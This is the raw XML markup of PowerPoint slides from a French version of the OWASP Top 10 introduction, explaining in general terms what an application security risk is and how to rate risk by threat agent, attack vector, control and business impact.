                <a:gridCol w="4495800"/>
              </a:tblGrid>
              <a:tr h="344942">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Quel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> est </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" u="sng" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Mon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> Risque</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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3922258">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700" kern="1200" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Top 10 OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  se concentre sur l'identification des risques les plus graves pour un large éventail d’entreprises</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Pour chacun de ces risques, nous fournissons des informations générales sur la probabilité et l’impact technique en utilisant le schéma d’évaluation des risques suivant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, qui est basé sur la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Méthodologie d’évaluation des risques OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Vous seul</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="none" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> con</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>naissez les caractéristiques de votre environnement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> et de votre métier. Pour une application donnée, il n’y a peut-être pas d’agent de menace pouvant réaliser un type d’attaque, ou il peut n’y avoir aucun impact technique. C’est pourquoi vous devez évaluer chaque risque </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pour vous-même</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, en vous concentrant sur les agents de menace, contrôles de sécurité et impacts métiers relatifs à votre  votre entreprise. Nous classons les agents de menace comme spécifiques aux applications, et les impacts métiers comme spécifiques aux applications ou au métier pour indiquer qu’ils sont clairement dépendants des détails de l’application dans votre entreprise.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Le nom des risques dans le Top 10 découle du type d’attaque, du type de faiblesse, ou du type d’impact qu’il peut causer. Nous choisissons des noms qui reflètent les risque de manière précise, et, quand cela est possible, nous nous alignons sur la terminologie la plus répandue pour assurer la meilleure sensibilisation.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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1180910152"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143001"/>
          <a:ext cx="6858000" cy="3689666"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="359726">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Qu’est-ce qu’un risque de sécurité applicatif</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ct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solidFill>
                      <a:srgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="3297873">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Les attaquants peuvent potentiellement utiliser différents chemins à travers votre application pour porter atteinte à votre métier ou à votre entreprise. Chacun</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de ces chemins représente un risque qui peut, ou pas, être suffisamment grave pour mériter votre attention.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Parfois, ces chemins sont faciles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> à trouver et à exploiter, et parfois ils sont extrêmement difficiles. De même, le préjudice causé peut n’avoir aucune conséquence, ou faire cesser votre activité. Pour déterminer le risque pour votre entreprise, vous pouvez évaluer la probabilité relative à chaque agent de menace, vecteur d’attaque, et vulnérabilité et les combiner avec une estimation d’impact technique et financier pour votre entreprise. Ensembles, ces facteurs déterminent le risque global.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="4E8542"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="4E8542"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="4E8542"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="4E8542"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="71" name="Group 70"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="76200" y="2142441"/>
            <a:ext cx="6680712" cy="1970250"/>
            <a:chOff x="194197" y="588061"/>
            <a:chExt cx="6411319" cy="2613280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Can 71"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876800" y="2318349"/>
              <a:ext cx="685800" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Bien</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Right Arrow Callout 72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1312744" y="1142999"/>
              <a:ext cx="820856" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 19030"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 25000"/>
                <a:gd name="adj4" fmla="val 76615"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Attaque</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="74" name="Rectangle 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3881651" y="1145267"/>
              <a:ext cx="685800" cy="454932"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Contrôle</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Folded Corner 74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867400" y="1763508"/>
              <a:ext cx="738116" cy="446965"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="B3D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accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Right Arrow Callout 75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1312744" y="1672660"/>
              <a:ext cx="820856" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25000"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 29478"/>
                <a:gd name="adj4" fmla="val 76917"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solid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err="1" smtClean="0">
                  <a:solidFill>
